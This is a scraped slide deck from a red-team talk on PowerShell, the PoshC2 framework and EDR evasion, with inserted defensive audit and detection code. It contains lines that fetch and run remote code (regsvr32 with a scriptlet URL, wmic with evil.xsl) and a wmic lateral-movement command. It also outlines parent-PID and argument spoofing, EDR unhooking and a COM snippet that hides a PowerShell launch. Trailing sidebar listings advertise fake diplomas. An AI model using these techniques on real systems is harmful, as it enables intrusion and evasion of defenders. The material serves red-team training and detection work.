PowerShell is DEAD
Epic Learnings
June 2019
Contents
Introductions
+ Whoami / Whoarewe
What is PowerShell
+ Understand what PowerShell is / key components
+ Is it DEAD?
Evolution of PoshC2
+ Release timeline & changes
EDR
+ History & challenges (offensive)
+ Future predictions
@benpturner
+ Managing Principal Security Consultant @ Nettitude
+ Lead the Global Red Team Operation @ Nettitude
+ 8 years as a Crest Team Leader (CHECK Team Leader - Infrastructure)
+ 4 years as a Crest Simulated Attack Specialist (CCSAS - STAR/CBEST)
Training / Talks
+ Advanced Threat Actor Simulation - Red Team Training Course (Steelcon 2017/2018)
+ Workshops - Red Teaming with PoshC2 (BSides London/Manchester 2017)
+ Trusted Third Parties are NOT Trust Worthy (GiSEC Dubai 2019) - https://bit.ly/2I9ehIg
+ 21st Century War Stories (Steelcon/BSides 2016) - https://www.youtube.com/watch?v=O8Ul6QSPuo4
+ PowerShell Fu with Metasploit (Steelcon/BSides 2015) - https://www.youtube.com/watch?v=ottfZFRSsj4
Development Projects
+ Lead developer of PoshC2 - Nettitude’s Open Source Command & Control (C2) Framework
+ General day to day PowerShell / C# projects & security research
@b4ggio_su
+ Principal Security Consultant @ Nettitude
+ A Red Team Lead in the Global Red Team Operation @ Nettitude
+ 16 years in IT:
• 4 years as a sysadmin
• 4 years in a defensive role
• 8 years in an offensive role
Training / Talks
+ Advanced Threat Actor Simulation - Red Team Training Course
+ Red Team & Stuff (Bsides Mcr 2018 / OWASP Warwick 2019)
@rbmaslen
+ Principal Security Consultant @ Nettitude
+ Red Teamer/Tools developer
+ 20 years in IT:
• 14 years as a developer (mainly C++, C#, HTML/JS)
• 6 years in an offensive role
+ CCT / CCSAM / OSCP / OSCE
Training / Talks
+ Thick Client Destruction (Steelcon 2017)
+ COM and the PowerThIEf (Steelcon 2018)
Development Projects
+ Contributor to PoshC2 - Nettitude’s Open Source Command & Control (C2) Framework
+ PowerThIEf, SharpSocks, C# portscanner & ArpScan
Team Spicy Weasel
1st Place - 2018
+ labs.nettitude.com/blog/derbycon-2018-ctf-write-up
1st Place - 2017
+ labs.nettitude.com/blog/derbycon-2017-ctf-write-up
3rd Place - 2016
+ labs.nettitude.com/blog/derbycon-2016-ctf-write-up
What is PowerShell & is it DEAD?
1. The Microsoft binary - "PowerShell.exe"
2. The DLL behind the binary - "System.Management.Automation.dll"
3. The folder - C:\Windows\System32\WindowsPowerShell\v1.0
4. The version? Is PSv2 dead, or only versions after 4 because of Transcript Logging, ScriptBlock Logging, Module Logging & AMSI Integration?
https://www.youtube.com/watch?v=IYD_aiQtVaE
Is PowerShell DEAD?
Evolution of PoshC2
Evolution of PoshC2 2016 -> 2019
2016
• June - v1.0 First Release of PoshC2 (Server/Implant in PowerShell)
• Dec - v2.0 Released - C# GUI, Daisy Chaining & Portability
2017
• Mar - v2.1 Removed C# GUI
• May - PoshC2 Slack channel announced
• July - PoshC2_Python Release
• Oct - Reflective DLL / Shellcode Released
• Nov - v3.0 Released with SharpSocks
2018
• Feb - Readthedocs Documentation Released
• July - v4.0 Released with Python Implant
2019
• Jan - v4.8 Sharp Implant
• Feb - Support for 2003/XP
• June - SharpSocks Integration
PoshC2 – PowerShell Server
Process Listing – Initial Execution
Generic PowerShell Implant
Carbon Black / Tanium / EDR
1. This is probably the best query in Carbon Black to detect malicious activity:
   "process_name:powershell.exe"
2. Do a search across your estate and see how much this shows up...
Carbon Black / Tanium / EDR
1. This is probably the best query in Carbon Black to detect malicious activity:
   "modload:system.management.automation.dll"
   "modload:system.management.automation.ni.dll"
2. Filter out "powershell.exe", and others...
3. Do a search across your estate and see how much this shows up...
Defensive / Legacy Approach (Reactive)
• Block powershell.exe on all endpoints
• Only allow signed PowerShell scripts to be executed
• Upgrade "powershell.exe" to v5.0 for greater visibility
• Enable constrained mode to restrict language elements
• Monitor for "System.Management.Automation.dll" in processes
• Integrate AMSI with AV vendor for early signature detection
• Enable & Monitor ScriptBlock Logging for suspicious cmdlets
• Enable & Monitor Transcript Logging for suspicious signatures
• Enable & Monitor Module Logging for signatured modules
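A read-only audit of the controls in that list, as an added PowerShell example (not from the original deck). It assumes the standard Group Policy registry locations under HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell, the AMSI provider registration key under HKLM:\SOFTWARE\Microsoft\AMSI\Providers, and an elevated Windows PowerShell 5.x session on the host being checked.

```powershell
# Added example (not from the original deck): audit the controls listed on the
# "Defensive / Legacy Approach" slide. Assumes the standard Group Policy
# registry locations and an elevated Windows PowerShell 5.x session.

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Get-PolicyValue {
    # Returns the DWORD behind a policy, or $null when the key/value is absent
    param([string]$SubKey, [string]$Name)
    $path = Join-Path $PolicyRoot $SubKey
    try {
        (Get-ItemProperty -Path $path -Name $Name -ErrorAction Stop).$Name
    } catch {
        $null   # not configured: treated as "control missing"
    }
}

function Test-V2EngineRemoved {
    # The v2 engine has none of the v5 logging/AMSI hooks, so a host that still
    # has it installed can be driven with "powershell -version 2".
    $feature = Get-WindowsOptionalFeature -Online -FeatureName 'MicrosoftWindowsPowerShellV2Root' -ErrorAction SilentlyContinue
    if ($null -eq $feature) { return $false }   # could not determine (not elevated?): flag for manual check
    return $feature.State -ne 'Enabled'
}

function Test-ScriptBlockLogFlowing {
    # A policy bit being set is not the same as events arriving: look for a 4104
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    $evt = Get-WinEvent -FilterHashtable $filter -MaxEvents 1 -ErrorAction SilentlyContinue
    return $null -ne $evt
}

function Test-AmsiProviderRegistered {
    # AV vendors integrate with AMSI by registering a provider CLSID here
    $providers = Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers' -ErrorAction SilentlyContinue
    return ($providers | Measure-Object).Count -gt 0
}

function Test-PowerShellHardening {
    [pscustomobject][ordered]@{
        EngineVersion5OrLater    = $PSVersionTable.PSVersion.Major -ge 5
        V2EngineRemoved          = Test-V2EngineRemoved
        ScriptBlockLoggingPolicy = (Get-PolicyValue 'ScriptBlockLogging' 'EnableScriptBlockLogging') -eq 1
        ScriptBlockEventsSeen    = Test-ScriptBlockLogFlowing
        ModuleLoggingPolicy      = (Get-PolicyValue 'ModuleLogging' 'EnableModuleLogging') -eq 1
        TranscriptionPolicy      = (Get-PolicyValue 'Transcription' 'EnableTranscripting') -eq 1
        AmsiProviderRegistered   = Test-AmsiProviderRegistered
        # Language mode of the session this audit runs in (admins usually get FullLanguage)
        ConstrainedLanguage      = $ExecutionContext.SessionState.LanguageMode -eq 'ConstrainedLanguage'
        SignedScriptsOnly        = (Get-ExecutionPolicy -Scope MachinePolicy) -eq 'AllSigned'
    }
}

$result = Test-PowerShellHardening
$result | Format-List

# List the controls that are not in place so they can be ticked off the slide's list
$result.PSObject.Properties |
    Where-Object { -not $_.Value } |
    ForEach-Object { Write-Warning ("Control not in place: {0}" -f $_.Name) }
```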
Modern Approach (Proactive)
"Is PowerShell DEAD?"
"NO IT'S NOT"
"APT33 according to FireEye"
Supposedly Used by APT33
• Suspected attribution: Iran
• Target sectors: Aerospace, energy
• Overview: APT33 has targeted organizations, spanning multiple industries, headquartered in the U.S., Saudi Arabia and South Korea. APT33 has shown particular interest in organizations in the aviation sector involved in both military and commercial capacities, as well as organizations in the energy sector with ties to petrochemical production.
• https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html
• https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html
• https://www.fireeye.com/current-threats/apt-groups.html#apt33
Introducing C# Implant
PoshC2_Python
C# Implant
C# Implant / Reflection
• loadmodule Seatbelt.exe
• run-exe Seatbelt.Program Seatbelt all
• run-exe Seatbelt.Program Seatbelt PowerShellSettings
• run-dll Seatbelt.Program Seatbelt UserChecks
C# Reflection
• foreach (var Ass in AppDomain.CurrentDomain.GetAssemblies())
• run-exe: loadedType.Assembly.EntryPoint.Invoke(null, new object[] { splitnewargs }).ToString();
• run-dll: loadedType.Assembly.GetType(qualifiedname).InvokeMember(sMethod, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, new object[] { splitnewargs }).ToString();
C# Reflection / OpSec Considerations
EDR / Next Gen AV
Example Vendors
Endpoint Detection and Response
Attacker Thoughts
• Avoidance
• Trickery
• Partying with EDR
Avoidance
Avoidance - Carbon Black
Detected – But why:
RTFM!
Avoidance – Tanium Signal Definition
image.path contains 'system.management.automation'
AND process.path contains NOT 'mscorsvw.exe'
AND process.path contains NOT 'monitoringhost.exe'
AND process.path contains NOT 'powershell.exe'
AND process.path contains NOT 'powershell_ise.exe'
AND process.path contains NOT 'sdiagnhost.exe'
AND process.path contains NOT 'servermanager.exe'
AND process.path contains NOT 'sqlps.exe'
AND process.path contains NOT 'wsmprovhost.exe'
AND process.path contains NOT 'Microsoft Azure AD Sync\Bin\miiserver.exe'
(Does require process tracing to be enabled in Tanium - quite heavy)
Warning - Not doing a hash checksum on the processes or their location
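The signal above and the hash/location warning, worked through as an added PowerShell example that is not part of the original deck: the name-only rule as written on the slide beside a full-path version, both run over constructed module-load events (the process paths, PIDs and the updater.exe implant name are made up for the example; the expected host locations are assumptions to replace with your own golden image).

```powershell
# Added example, not from the original deck: the Tanium-style rule from the
# slide run over constructed module-load events, next to a stricter version
# keyed on the full path of each legitimate host. All event data is constructed.

# Name-only exclusions, transcribed from the signal definition on the slide
$NameAllowlist = @(
    'mscorsvw.exe', 'monitoringhost.exe', 'powershell.exe', 'powershell_ise.exe',
    'sdiagnhost.exe', 'servermanager.exe', 'sqlps.exe', 'wsmprovhost.exe',
    'Microsoft Azure AD Sync\Bin\miiserver.exe'
)

# Stricter allowlist: the exact location each legitimate host is expected in.
# Assumed locations for the example; build yours from a golden image.
$PathAllowlist = @(
    'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
    'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe',
    'C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe',
    'C:\Windows\System32\wsmprovhost.exe',
    'C:\Windows\System32\sdiagnhost.exe'
)

function Test-AutomationImage {
    param([string]$ImagePath)
    # Matches both the IL and the NGEN'd (.ni.dll) image, as in the Carbon Black queries
    return $ImagePath -match 'system\.management\.automation(\.ni)?\.dll$'
}

function Test-NameRule {
    # Faithful to the slide: a substring hit on the host name excludes the event.
    # This is the "no hash/location check" weakness noted on the slide.
    param([string]$ProcessPath, [string]$ImagePath)
    if (-not (Test-AutomationImage $ImagePath)) { return $false }
    foreach ($name in $NameAllowlist) {
        if ($ProcessPath -like "*$name*") { return $false }
    }
    return $true
}

function Test-PathRule {
    # Exact (case-insensitive) full-path comparison: a copy of powershell.exe
    # dropped anywhere else no longer inherits the exclusion.
    param([string]$ProcessPath, [string]$ImagePath)
    if (-not (Test-AutomationImage $ImagePath)) { return $false }
    return -not ($PathAllowlist -contains $ProcessPath)
}

function Test-HostBinaryTrusted {
    # Optional extra when the binary is still on disk: require a valid Microsoft
    # Authenticode signature rather than trusting the name or path at all.
    param([string]$ProcessPath)
    if (-not (Test-Path -LiteralPath $ProcessPath)) { return $null }   # unknown: not on this host
    $sig = Get-AuthenticodeSignature -FilePath $ProcessPath
    return ($sig.Status -eq 'Valid') -and ($sig.SignerCertificate.Subject -match 'Microsoft')
}

# Constructed events in Sysmon ImageLoad / EDR modload style
$SmaDll = 'C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll'
$Events = @(
    # legitimate host in its expected location: excluded by both rules
    [pscustomobject]@{ ProcessId = 4312; ProcessPath = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ImagePath = $SmaDll }
    # relocated copy: the substring 'powershell.exe' still matches, so only the path rule fires
    [pscustomobject]@{ ProcessId = 5120; ProcessPath = 'C:\Users\Public\powershell.exe'; ImagePath = $SmaDll }
    # unknown binary hosting the automation engine: both rules fire
    [pscustomobject]@{ ProcessId = 6004; ProcessPath = 'C:\Users\alice\AppData\Local\Temp\updater.exe'; ImagePath = $SmaDll }
    # same binary loading only the CLR: neither rule sees it (the gap a pure C# implant sits in)
    [pscustomobject]@{ ProcessId = 6004; ProcessPath = 'C:\Users\alice\AppData\Local\Temp\updater.exe'; ImagePath = 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll' }
)

$Events | ForEach-Object {
    [pscustomobject]@{
        ProcessId   = $_.ProcessId
        ProcessPath = $_.ProcessPath
        NameRule    = Test-NameRule -ProcessPath $_.ProcessPath -ImagePath $_.ImagePath
        PathRule    = Test-PathRule -ProcessPath $_.ProcessPath -ImagePath $_.ImagePath
        SignedByMS  = Test-HostBinaryTrusted -ProcessPath $_.ProcessPath
    }
} | Format-Table -AutoSize
```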
Trickery
Parent PID Spoofing
https://stackoverflow.com/questions/10554913/how-to-call-createprocess-with-startupinfoex-from-c-sharp-and-re-parent-the-ch
Parent PID Spoofing / Carbon Black
Detecting Parent Spoofing
https://www.countercept.com/blog/detecting-parent-pid-spoofing/
Process Argument Spoofing
1. Create a process suspended – Fake Arguments
2. Identify the PEB using NtQueryInformationProcess
3. Parse the PEB and CommandLine structure
4. Overwrite the CommandLine arguments using WriteProcessMemory – Real Arguments
5. Resume the process
Process Argument Spoofing
• https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing
• https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/
• https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/
Process Argument Spoofing – WHY?
Execution
• PowerShell One Liner
• regsvr32.exe /s /i:http://URL/file.sct scrobj.dll
• wmic os get /FORMAT:"evil.xsl"
Lateral Movement
• SC \\COMPUTERNAME stop "SERVICENAME"
• wmic.exe /node:<target> /user:<user> /password:"<password>" process call create "%Systemroot%\Temp\batchfile.bat"
Partying with EDR
Migration Basics - Win API Calls:
• VirtualAllocEx
• WriteProcessMemory
• CreateRemoteThread
http://deniable.org/misc/inject-all-the-things
However, there are many ways to do the same thing; quick examples:
• RtlCreateUserThread
• NtCreateThreadEx
• SetWindowsHookEx
• QueueUserAPC
What is Hooking?
"In computer programming, the term hooking covers a range of techniques used to alter or augment the behaviour of an operating system, of applications, or of other software components by intercepting function calls or messages or events passed between software components. Code that handles such intercepted function calls, events or messages is called a hook." - Wikipedia
EDR Hooking
Before EDR
After EDR
Other EDRs
• Re-patch memory to remove the JMP to the original code
• Update the IAT table to point to the correct function
• Create a stub – to carry out the same system calls
• Free a number of API calls and use FreeLibrary to remove interfering DLLs
https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6
Bringing Back The Good Times
Demo
"Becoming best mates with COM"
COM Intro – just watch this
https://vimeo.com/214856542
• Spoke about this at Steelcon last year; it has proved really handy
• Has been used to get past some EDRs
• Breaks the attribution between processes
Migrating with COM into IE
The key to this? Junction folders
• Junction folders, a technique leaked in the Vault 7 dumps
• Forms the basis of SandboxEscaper's recent IE 11 sandbox escape
• After adding some registry keys, allows code to be executed when you navigate to a folder
Junction folders
Loading the DLL in IE – first set up the registry
• If we can get a reference to an IE window we can call it
• URL needs to be in the format shell:::{<GUID>}
• https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/platform-apis/aa752094(v%3Dvs.85)
How can we use that?
ShellWindows
• Great COM class that allows you to enumerate all the currently open IE & Explorer windows and automate them
• Guess what: you can then get them to navigate to a new location
• https://msdn.microsoft.com/en-us/library/windows/desktop/bb773974(v=vs.85).aspx
Loading the DLL in IE, PowerShell
$shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")
$typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
$shwin = [System.Activator]::CreateInstance($typeShwin)
$shwin[0].Navigate2("shell:::{56B6E39E-AB81-4E34-BC8B-99D1D28FB7E4}", 2048)
<# CLSID must be in the format "shell:::{CLSID}"
   Second param 2048 is the BrowserNavConstants value for navOpenInNewTab
   https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx
   Further ideas on what payloads you may be able to use #>
Weaponisable? Yes, in VBA
Can you do this in VBA? Yes, of course
• Only use native DLLs? Thankfully not
• Using CCWs (COM Callable Wrappers) we can write a .NET DLL and configure the registry keys so that when navigated to we can launch a .NET DLL. Use this as a COM hijack if you want.
• No time to go into CCW in depth, but have a read of https://docs.microsoft.com/en-us/dotnet/framework/interop/com-callable-wrapper
• .NET is started in IE and loads the DLL
• We need a .NET assembly with a class that implements an interface, and some registry keys
COM Callable Wrapper
COM Callable Wrapper – Class Interface
Native DLLs only?
Getting the reg keys
Setting up the .NET registry keys
• Just make sure that you create or import the keys from an x64 application, or use the explicit 64-bit key from the link below
• https://docs.microsoft.com/en-us/windows/desktop/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
Also guess what the IE shortcut now does?
One last thing – remember this script
$shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")
$typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
$shwin = [System.Activator]::CreateInstance($typeShwin)
$shwin[0].Navigate2("shell:::{56B6E39E-AB81-4E34-BC8B-99D1D28FB7E4}", 2048)
<# CLSID must be in the format "shell:::{CLSID}"
   Second param 2048 is the BrowserNavConstants value for navOpenInNewTab
   https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx
   Further ideas on what payloads you may be able to use #>
Let's tweak it
$shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")
$typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
$shwin = [System.Activator]::CreateInstance($typeShwin)
$shwin[0].Navigate("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe")
Running it (must have at least 1 explorer window open)
Look who the parent is?
EDR Summary
• EDR is not a silver bullet
• Does give incredible visibility to the Blue Team
• Highly recommended as a complementary piece of the defensive strategy, but should not be solely relied on
• Does not replace good people with experience
• Constant cat-and-mouse game
Future Predictions
1. Over-reliance on EDR, especially on user endpoints and not on server land or non-Windows systems
2. Customers focussing all attention on tertiary endpoints and not on critical functions or sensitive customer data
3. Move to Zero Trust networks and MFA everywhere
4. Machine Learning – investment into process & procedures
5. C2 frameworks moving to C++ base code – could see MSF be revived for red teaming
6. All standard AV/EDR vendors adopting in-memory scanning / AMSI
7. Windows 7 is EOL January 2020 – not a prediction but a reality
8. Windows 10 removal of .NET v2 – not a prediction but a reality
9. People going back to single executables running either C++ or C# code to evade LOLBAS signatures (LOLBAS vs arbitrary exe)
Future Predictions
1. Over-reliance on EDR, especially on endpoints and not server land (or Unix really)
2. C2 frameworks moving to C++ base code – could see MSF be revived for RT
3. We already have this level of capability and it's interesting what gets detected and what does not
4. All standard AV/EDR vendors adopting in-memory scanning
5. Windows 7 is EOL January 2020 – not a prediction but a massive jump
6. Windows 10 removal of .NET v2
7. People going back to single executables running either C++ or C# code to evade LOLBins signatures and
THANK YOU
Ben Turner @benpturner
Doug McLeod @b4ggio_su
Rob Maslen @rbmaslen
https://www.steelcon.info/training/
https://www.slideshare.net/nettitude_labs/powershell-is-dead-epic-learning

Gen Z and the marketplaces - let's translate their needs
 
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfMeet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
 
7 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 20247 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 2024
 
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
 
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
存档可查的(USC毕业证)南加利福尼亚大学毕业证成绩单制做办理
 
制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
制作毕业证书(ANU毕业证)莫纳什大学毕业证成绩单官方原版办理
 
[HUN][hackersuli] Red Teaming alapok 2024
[HUN][hackersuli] Red Teaming alapok 2024[HUN][hackersuli] Red Teaming alapok 2024
[HUN][hackersuli] Red Teaming alapok 2024
 
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
 
Discover the benefits of outsourcing SEO to India
Discover the benefits of outsourcing SEO to IndiaDiscover the benefits of outsourcing SEO to India
Discover the benefits of outsourcing SEO to India
 
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalmanuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
 

powershell-is-dead-epic-learnings-london

  • 6. Team Spicy Weasel
    1st Place - 2018
    + labs.nettitude.com/blog/derbycon-2018-ctf-write-up
    1st Place - 2017
    + labs.nettitude.com/blog/derbycon-2017-ctf-write-up
    3rd Place - 2016
    + labs.nettitude.com/blog/derbycon-2016-ctf-write-up
  • 7. What is PowerShell & is it DEAD?
    1. The Microsoft binary - "PowerShell.exe"
    2. The DLL behind the binary - "System.Management.Automation.dll"
    3. The folder - C:\Windows\System32\WindowsPowerShell\v1.0
    4. The version? Is PSv2 dead, or only versions after 4, because of Transcript Logging, ScriptBlock Logging, Module Logging & AMSI integration?
    https://www.youtube.com/watch?v=IYD_aiQtVaE
  • 9. Evolution of PoshC2 2016 -> 2019
    2016
    + June - v1.0 First Release of PoshC2 (Server/Implant in PowerShell)
    + Dec - v2.0 Released - C# GUI, Daisy Chaining & Portability
    2017
    + Mar - v2.1 Removed C# GUI
    + May - PoshC2 Slack channel announced
    + July - PoshC2_Python Release
    + Oct - Reflective DLL / Shellcode Released
    + Nov - v3.0 Released with SharpSocks
    2018
    + Feb - Readthedocs Documentation Released
    + July - v4.0 Released with Python Implant
    2019
    + Jan - v4.8 Sharp Implant
    + Feb - Support for 2003/XP
    + June - SharpSocks Integration
  • 11. Process Listing – Initial Execution
  • 13. Carbon Black / Tanium / EDR
    1. This is probably the best query in Carbon Black to detect malicious activity: "process_name:powershell.exe"
    2. Do a search across your estate and see how much this shows up…
  • 14. Carbon Black / Tanium / EDR
    1. This is probably the best query in Carbon Black to detect malicious activity: "modload:system.management.automation.dll" / "modload:system.management.automation.ni.dll"
    2. Filter out "powershell.exe", and others…
    3. Do a search across your estate and see how much this shows up…
  • 15. Defensive / Legacy Approach (Reactive)
    + Block powershell.exe on all endpoints
    + Only allow signed PowerShell scripts to be executed
    + Upgrade "powershell.exe" to v5.0 for greater visibility
    + Enable constrained language mode to restrict language elements
    + Monitor for "System.Management.Automation.dll" in processes
    + Integrate AMSI with AV vendor for early signature detection
    + Enable & monitor ScriptBlock Logging for suspicious cmdlets
    + Enable & monitor Transcript Logging for suspicious signatures
    + Enable & monitor Module Logging for signatured modules
    Modern Approach (Proactive)
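The "Enable & monitor ScriptBlock Logging" item above is only useful if someone actually consumes the 4104 events, and those events have a wrinkle: the engine splits long script blocks across several records (MessageNumber of MessageTotal) that share one ScriptBlockId, so a rule that matches single records misses indicators that straddle a split. The following Python is an added example written for this page (it is not code from the talk or from PoshC2); the 4104 records, the host names and the indicator list are constructed for illustration, and the field names are the ones the real event carries.

```python
"""Reassemble PowerShell ScriptBlock Logging records (Event ID 4104) and flag
suspicious content.  Added example for this page; the event records below are
constructed, not real telemetry, and the rule list is illustrative."""
import re
import xml.etree.ElementTree as ET
from collections import defaultdict

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Indicators a 4104 triage rule might look for (illustrative, not exhaustive).
SUSPICIOUS = {
    "base64-decode": re.compile(r"FromBase64String", re.I),
    "web-download": re.compile(r"Download(String|File|Data)\s*\(", re.I),
    "dynamic-eval": re.compile(r"\bInvoke-Expression\b|\bIEX\b", re.I),
    "reflective-load": re.compile(r"Reflection\.Assembly\]::Load", re.I),
    "memory-alloc": re.compile(r"\bVirtualAlloc(Ex)?\b", re.I),
}


def event_xml(computer, sid, num, total, text, path=""):
    """Build a constructed 4104 record carrying the fields the real event has.
    (text must not contain '<' or '&'; the constructed samples do not.)"""
    return f"""<Event xmlns="{NS['e']}">
  <System><EventID>4104</EventID><Computer>{computer}</Computer></System>
  <EventData>
    <Data Name="MessageNumber">{num}</Data>
    <Data Name="MessageTotal">{total}</Data>
    <Data Name="ScriptBlockText">{text}</Data>
    <Data Name="ScriptBlockId">{sid}</Data>
    <Data Name="Path">{path}</Data>
  </EventData>
</Event>"""


# Constructed sample: one block split in two, one benign block, one block
# whose remaining fragments have not arrived yet.
SAMPLE_EVENTS = [
    event_xml("WS01", "blk-aaaa", 1, 2,
              "$c = New-Object System.Net.WebClient; "
              "$s = $c.DownloadString('http://example.invalid/a'); "),
    event_xml("WS01", "blk-aaaa", 2, 2, "IEX $s"),
    event_xml("WS01", "blk-bbbb", 1, 1,
              "Get-ChildItem C:\\Windows\\Temp | Where-Object { $_.Length -gt 1MB }",
              path="C:\\Scripts\\cleanup.ps1"),
    event_xml("WS02", "blk-cccc", 1, 3,
              "$b = [Convert]::FromBase64String('QUJD'); "),
]


def parse_4104(xml_text):
    """Pull the fields we need out of one 4104 record."""
    root = ET.fromstring(xml_text)
    data = {d.get("Name"): (d.text or "") for d in root.find("e:EventData", NS)}
    return {
        "computer": root.find("e:System/e:Computer", NS).text,
        "id": data["ScriptBlockId"],
        "num": int(data["MessageNumber"]),
        "total": int(data["MessageTotal"]),
        "text": data["ScriptBlockText"],
        "path": data.get("Path", ""),
    }


def reassemble(events):
    """Join fragments per ScriptBlockId; return (complete blocks, pending ids)."""
    parts, meta = defaultdict(dict), {}
    for ev in map(parse_4104, events):
        parts[ev["id"]][ev["num"]] = ev["text"]
        meta[ev["id"]] = ev
    blocks, pending = {}, set()
    for sid, chunks in parts.items():
        total = meta[sid]["total"]
        if len(chunks) != total:
            pending.add(sid)          # do not score a partial block
            continue
        blocks[sid] = "".join(chunks[i] for i in range(1, total + 1))
    return blocks, pending


def scan(events):
    """Score each complete block against SUSPICIOUS; return the hits."""
    blocks, _ = reassemble(events)
    _, meta = _meta(events)
    findings = []
    for sid, text in blocks.items():
        hits = sorted(name for name, rx in SUSPICIOUS.items() if rx.search(text))
        if hits:
            findings.append({"id": sid, "computer": meta[sid]["computer"],
                             "path": meta[sid]["path"], "rules": hits})
    return findings


def _meta(events):
    """Per-block metadata (computer, path) keyed by ScriptBlockId."""
    meta = {ev["id"]: ev for ev in map(parse_4104, events)}
    return None, meta


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['computer']} {f['id']} ({f['path'] or 'interactive'}): {', '.join(f['rules'])}")
```

Only the reassembled block is scored, so the DownloadString in fragment 1 and the IEX in fragment 2 are reported together; the three-part block that has only one fragment so far is held as pending rather than scored on incomplete text. An empty Path means the block was not run from a script file, which is itself worth a look.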
  • 19. Supposedly Used by APT 33
    + Suspected attribution: Iran
    + Target sectors: Aerospace, energy
    + Overview: APT33 has targeted organizations, spanning multiple industries, headquartered in the U.S., Saudi Arabia and South Korea. APT33 has shown particular interest in organizations in the aviation sector involved in both military and commercial capacities, as well as organizations in the energy sector with ties to petrochemical production.
    • https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html
    • https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html
    • https://www.fireeye.com/current-threats/apt-groups.html#apt33
  • 24. C# Implant / Reflection
  • 25. C# Implant / Reflection
    + loadmodule Seatbelt.exe
    + run-exe Seatbelt.Program Seatbelt all
    + run-exe Seatbelt.Program Seatbelt PowerShellSettings
    + run-dll Seatbelt.Program Seatbelt UserChecks
  • 26. C# Reflection
    + foreach (var Ass in AppDomain.CurrentDomain.GetAssemblies())
    + run-exe: loadedType.Assembly.EntryPoint.Invoke(null, new object[] { splitnewargs }).ToString();
    + run-dll: loadedType.Assembly.GetType(qualifiedname).InvokeMember(sMethod, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, new object[] { splitnewargs }).ToString();
  • 27. C# Reflection / OpSec Considerations
  • 31. Attacker Thoughts
    + Avoidance
    + Trickery
    + Partying with EDR
  • 33. Avoidance - Carbon Black Detected – But why: RTFM!
  • 34. Avoidance – Tanium Signal Definition
    image.path contains 'system.management.automation'
    AND process.path contains NOT 'mscorsvw.exe'
    AND process.path contains NOT 'monitoringhost.exe'
    AND process.path contains NOT 'powershell.exe'
    AND process.path contains NOT 'powershell_ise.exe'
